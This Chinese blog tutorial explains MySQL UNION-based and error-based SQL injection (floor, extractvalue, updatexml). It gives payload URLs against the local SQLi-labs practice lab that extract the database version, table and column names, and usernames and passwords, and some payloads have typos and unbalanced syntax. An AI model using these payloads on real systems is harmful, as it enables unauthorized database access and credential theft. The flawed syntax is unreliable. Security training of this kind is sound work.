渗透(四)之Mysql的UNION联合注入和报错注入

最新推荐文章于 2024-06-07 07:48:16 发布
最新推荐文章于 2024-06-07 07:48:16 发布
阅读量2.2k 收藏 7
点赞数 3
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32719221/article/details/100658269
版权

union联合查询注入

UNION操作符用于合并两个或多个SELETC语句的结果集

前提

UNION内部的SELECT语句必须拥有相同数量的列,列也必须拥有相似的数据类型。同时,每条,每条SELECT语句中的列的顺序必须相同

默认情况下,UNION操作符选取不同的值,如果允许重复的值,请使用UNION ALL

UNION注入应用场景

  1. 只有最后一个SELECT 字句允许有ORDER BY;
    select * from users order by id union select 1,2,3;错误

  2. 只有最后一个SELECT字句允许有LIMIT
    select * from users limit 0,1 union select 1,2,3 错误

  3. 只要UNION连接的几个查询字段数一样且列的数据类型转换没有问题,就可以查询出结果
    insert update 数据库信息时也不能使用UNION注入

  4. 注入页面有回显

UNION注入过程

在这里插入图片描述
首先判断列出因为UION语句的前提必须是两个SELECT语句的列数相同

报错注入

使用函数让错误爆出来,在适当的地方插入SQL语句

报错注入原理

在这里插入图片描述

报错注入方法三大公式

在这里插入图片描述

1 floor报错注入方法原理

在这里插入图片描述

针对SQLlilab less-1

127.0.0.1/less-1/?id=1’and (select count(*) from information_schema.tables group by concat(select version()),floor(rand(0)*2)))–+
结果看到数据库版本报错

查看数据库有哪些表

127.0.0.1/less-1/?id=1’and (select count(*) from information_schema.tables group by concat(select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)))–+
结果users表

查看表中有哪些列

127.0.0.1/less-1/?id=1’and (select count(*) from information_schema.tables group by concat(select cloumn_name from information_schema.columns where table_name=‘users’ limit 0,1),floor(rand(0)*2)))–+
结果username password列

查看列中有哪些数据

127.0.0.1/less-1/?id=1’and (select count(*) from information_schema.tables group by concat(select concat(username,0x7e,password) from 'users’limit 1,1) ,floor(rand(0)*2)))–+

2 extractvalue()报错注入方法

在这里插入图片描述
select extractvalue(1,concat(’!’,(select user())));
concat链接的字符串第一位一定是一个非法的

3 updatexml()报错注入方法

在这里插入图片描述
第二个构造参数一定得错误
127.0.0.1/less-1/?id=1’and updatexml(1,concat(0x7e,(select user())),1)–+

如果想通过错误得到的信息过于长通过使用substr,截取报错信息的一部分
127.0.0.1/less-1/?id=1’and updatexml(1,concat(0x7e,substr((select user(),1,10)),1)–+
在这里插入图片描述

菜菜的程序猿
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mysql联合查询UNION和Order by同时使用问题的解决办法
09-10
很多朋友刚使用联合查询UNION的时候常常会理所当然的将联合查询理解为把没一个子查询的结果集组合成一个大的结果集
MYSQL updatexml()函数注入解析
09-09
这个函数在处理XML数据时非常有用,但同时也可能成为安全漏洞的来源,特别是在没有正确过滤用户输入的情况下,可能导致SQL注入。 `updatexml()`函数的基本语法如下: ```sql UPDATEXML(XML_document, XPath_...
union连接攻击MySQL函数,如何在MySQL中结合使用Rand函数和Union
weixin_39629989的博客
01-28 59
I'm trying to combine a result from 3 select statements that will choose different food names from different food categories. However my table has quite few instances of "foodItems". I need to select ...
Sqli-lab教程-史上最全详解(1-22通关)
最新发布
dzqxwzoe的博客
06-07 810
Less-1 联合注入Less-2Less-3Less-4Less-5 注入/布尔盲注/时间盲注Less-6 注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入
UNION连接的SQL中包含LIMIT
琅嬛
12-10 772
如果UNION连接的SQL中有LIMIT,那么需要使用括号,否则就会。 (SELECT {列} FROM {表名} LIMIT xxx) UNION ALL (SELECT {列} FROM {表名} LIMIT xxx);
sql注入中的联合注入
..
12-06 6052
联合注入 联合注入顾名思义,就是使用联合查询进行注入的一种方式,是一种高效的注入的方式,适用于有回显同时数据库软件版本是5.0以上的MYSQL数据库。至于为什么需要版本是5.0以上的MYSQL数据库是因为MYSQL会有一个系统数据库information_schema,能很快的通过几条注入语句获取到想要的数据。 UNION语法 mysql中,union用于将多个select语句的结果组合到一个结果集中,并删除结果集中的重复数据。 语法为: select column,...from tabl.
Mysql,使用 UNION 进行多表关联,SQL排序
dear_Alice_moon的专栏
02-07 1252
Mysql,使用 UNION 进行多表关联,SQL排序
PHP+MYSQL 注入靶场
04-26
下面将详细阐述SQL注入、PHP和MySQL在其中的作用以及如何进行渗透测试。 **SQL注入**是一种常见的网络安全威胁,发生在应用程序未能充分过滤或验证用户输入的情况下。攻击者可以插入恶意SQL代码到查询中,从而获取...
MySQL五种注入1
08-04
MySQL五种注入是一种利用数据库的误反馈信息来获取敏感数据的技术,通常在网站存在SQL注入漏洞时被攻击者利用。以下将详细介绍这些方法: 1. **数据库版本暴露** 利用`information_schema.tables`系统表和`...
Mysql注入联合查询
一个普普通通的博客
03-01 954
Mysql注入联合查询
MySQL8.0+问题(WITH查询,UNION ALL以后执行结果出
weixin_40649680的博客
08-16 1603
MySQL8.0+问题(WITH查询,UNION ALL以后执行结果出
sql注入union(Illegal mix of collations for operation UNION
qq_44897193的博客
06-03 8195
union连接information_schema时,就会出现Illegal mix of collations for operation UNION,经过一系列的检查发现之后,其实是union连接的字段的字符规则不一样。 此方法只适用于这个误的解决。 查看连接的是哪些字段,在哪个表中 找到对应的表中对应的字段,查看他们的字符规则 把他们修改为一致就可以了 以上就是出现union问题的解决方案。 注:UNION 内部的 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时
MySQL 使用 union 进行查询时, 查询结果映射失败
qq_44789658的博客
09-15 705
union 联合查询的小坑
SQL注入联合查询注入
qq_45691294的博客
07-11 7252
MySQL中的联合查询 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合在一起,使用为此为UNINO或UNION ALL 联合查询:将多个查询的结果合并到一起(纵向合并):字段数不变,多个查询的记录数合并 基本语法: select 语句 union[union选项] select 语句; 联合查询注入的条件 联合查询注入MySQL注入中的一种方式,在SQL注入中说了注入漏洞存在的相关条件,而联合查询注入这种方法需要满足查询的信息在前端有回显,回显数据的
记录:1221 - Incorrect usage of UNION and ORDER BY...【亲测有效】
**My Coding Family**
05-13 2666
记录解决:1221 - Incorrect usage of UNION and ORDER BY...,亲测有效。
MySQL笔记7——union/limit
菜鸟的博客
12-19 346
文章目录1、union2、limit使用 1、union 对两个或多个查询结果集进行合并 select ………… union select ………… 在使用时需要保证第一个查询和后面的查询的列的数量相等 **示例:**找出工作岗位是salesman和manager的员工 方法①: select ename,job from emp where job = 'manager' or job = 'salesman'; 方法②: select ename,job from emp where job i
MySQL关联查询 COUNT数据不准确
FirstMrRight的博客
10-10 1755
函数做统计的需求,同样在使用该函数时如果处理不当会导致统计出的数据是真实数据N倍的问题,出现重复问题导致统计不准确。出现该问题的原因是关联查询的主表与关联表关联关系不是。张三有三辆车,李四两辆,王五无车,可见统计方法出现了重复统计。MySQL在进行关联查询时,首先扫描主表,以主表为基础数据通过。车主和车辆的关系为1:N,两表通过own_id关联。条件会匹配到张三的车辆表3条数据。在业务开发中常遇到关联查询使用。查询车主的姓名和统计功能。
mysql union limit_mysql中的union和order by、limit
weixin_29920889的博客
02-01 753
CREATE TABLE `test1` (`id` int(10) unsigned NOT NULL AUTO_INCREMENT,`name` varchar(20) NOT NULL,`desc` varchar(100) NOT NULL,PRIMARY KEY (`id`)) ENGINE=InnoDB DEFAULT CHARSET=utf8(1)以下查询会误:[Err] 122...
mysql注入 —— union
SPS98
05-07 643
union可以用于合并两个或多个select语句的结果集 场景: PHP中使用的查询代码大致如下(可能有语法误) $id = $_GET['id']; $sql = "select * from users where id = '$id' limit 0, 1"; $result = mysqld_query($sql); $row = mysqld_fetch_array($result)...
Mysql注入总结1
08-03
本文将对Mysql注入的常见姿势进行总结,并介绍如何通过union select语句来实现注入攻击。 首先,需要了解Mysql注入的原理。当一个应用程序在处理用户输入时,如果未对输入进行充分验证和过滤,就有可能构造恶意的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值